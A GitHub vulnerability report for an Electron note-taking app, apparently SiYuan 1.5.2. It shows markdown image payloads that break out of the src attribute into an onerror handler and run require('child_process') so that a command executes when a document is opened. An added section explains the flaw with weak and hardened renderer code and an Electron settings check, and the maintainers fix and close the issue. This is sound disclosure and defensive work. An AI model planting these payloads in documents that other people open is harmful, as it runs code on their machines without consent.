XSS leads to client-side RCE #3431

Closed
Echocipher opened this issue Nov 16, 2021 · 2 comments

Comments

@Echocipher
Describe the problem

Because tag filtering in the document body is not strict, there is an XSS vulnerability; and because importing child_process via require is not restricted, system commands can be executed. Likewise, system commands can also be executed via process.

Expected result

Fix the XSS vulnerability and the command execution caused by Electron.

Screenshot or screen recording presentation

XSS

Create a new document and insert the following PoC:

![a]("onerror="alert(1))

[screenshot: effect in the client]

[screenshot: effect in the browser]

Command execution

We can then execute commands directly through require, for example launching Calculator. Create a new document and insert the following PoC; it triggers as soon as the user opens the document:

![a]("onerror="require('child_process').exec('open -a Calculator',null);)


Windows and process work the same way; PoC as below:

![a]("onerror="eval(atob('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')))


Version environment

  • Version: 1.5.2 (1.5.2)
  • Operating system: macOS/Windows
  • Browser (if used): Any
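The two halves of the report above are (1) an image destination that is interpolated into an `src` attribute without escaping, so the `"` in `"onerror="alert(1)` closes the attribute early and the rest becomes an `onerror` handler, and (2) an Electron renderer in which page script can reach `require`. The following is an added example, not code from SiYuan or lute: a deliberately weak image renderer beside a hardened one, a small attribute tokenizer to show which attributes a browser would end up with, and a check on Electron `webPreferences`. All names (`IMAGE_RE`, `renderImageUnsafe`, `renderImageSafe`, `isSafeUrl`, `attributeNames`, `rendererPrefsAreWeak`) are chosen here for illustration; the `webPreferences` check assumes current Electron defaults (nodeIntegration off, contextIsolation on), so only explicit weakening is flagged.

```javascript
// Added example (not SiYuan's or lute's code). Shows why
// ![a]("onerror="alert(1)) becomes an executable attribute in a renderer that
// interpolates the destination verbatim, and a rendering that does not.
// Every identifier below is illustrative, not a project API.

// Simplified ![alt](dest) pattern allowing two levels of balanced parentheses
// in the destination (enough for alert(1) and eval(atob('...'))); not full CommonMark.
const IMAGE_RE = /!\[([^\]]*)\]\(((?:[^()]|\((?:[^()]|\([^()]*\))*\))*)\)/g;

// Weak renderer: the destination `"onerror="alert(1)` closes src="" early and
// the remainder is tokenized by the browser as a new attribute.
function renderImageUnsafe(markdown) {
  return markdown.replace(IMAGE_RE, (_, alt, dest) => `<img src="${dest}" alt="${alt}">`);
}

// Escape every character that can terminate or split an attribute value.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Allow scheme-less (relative) destinations and http(s) only. Control
// characters are stripped first because browsers ignore them inside a scheme
// ("java\tscript:" is still javascript:).
function isSafeUrl(dest) {
  const cleaned = dest.replace(/[\u0000-\u0020\u007f]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (!m) return true;
  return ['http', 'https'].includes(m[1].toLowerCase());
}

// Hardened renderer: attribute-escape both captured strings and blank src for a
// disallowed scheme. Escaping alone already defeats the quote-break in the PoC;
// the scheme check covers the separate javascript: destination case.
function renderImageSafe(markdown) {
  return markdown.replace(IMAGE_RE, (_, alt, dest) => {
    const src = isSafeUrl(dest) ? dest : '';
    return `<img src="${escapeAttr(src)}" alt="${escapeAttr(alt)}">`;
  });
}

// Rough model of the HTML tokenizer's attribute splitting: after a quoted
// value a new attribute name may begin immediately, with no whitespace.
function attributeNames(html) {
  const names = [];
  const re = /([^\s"'=<>\/]+)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1]);
  return names;
}

// Second half of the report: page script can only call require('child_process')
// in a renderer with nodeIntegration enabled; contextIsolation: false additionally
// lets page script reach the preload's globals. Assumes current Electron defaults
// (nodeIntegration false, contextIsolation true), so only explicit weakening is flagged.
function rendererPrefsAreWeak(webPreferences) {
  const p = webPreferences || {};
  return p.nodeIntegration === true || p.contextIsolation === false;
}

// Constructed input: the PoC from the report.
const POC = '![a]("onerror="alert(1))';
console.log(renderImageUnsafe(POC), attributeNames(renderImageUnsafe(POC)));
console.log(renderImageSafe(POC), attributeNames(renderImageSafe(POC)));
console.log(rendererPrefsAreWeak({ nodeIntegration: true }));
```

Run it with node: the weak renderer yields the attributes `src, onerror, alt` for the PoC, the hardened one yields `src, alt` with the payload inert inside `src`. Fixing the renderer alone is not enough; with `nodeIntegration` still on, any future escaping bug is again a code-execution bug, which is why both findings in the report need separate fixes.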
@88250 88250 self-assigned this Nov 16, 2021
@88250 88250 added the Bug label Nov 17, 2021
@88250 88250 changed the title XSS导致客户端RCE to XSS 导致客户端 RCE ("XSS leads to client-side RCE") Nov 17, 2021
@88250 88250 added this to the 1.5.3 milestone Nov 17, 2021
88250 added a commit to 88250/lute that referenced this issue Nov 17, 2021
@88250 88250 closed this as completed Nov 17, 2021
@ttimasdf

ttimasdf commented Nov 18, 2021

Vendor confirmed; let's get a CNVD number assigned 😄

@88250 (Member)

88250 commented Nov 18, 2021

Please keep helping us look for security vulnerabilities, thank you.
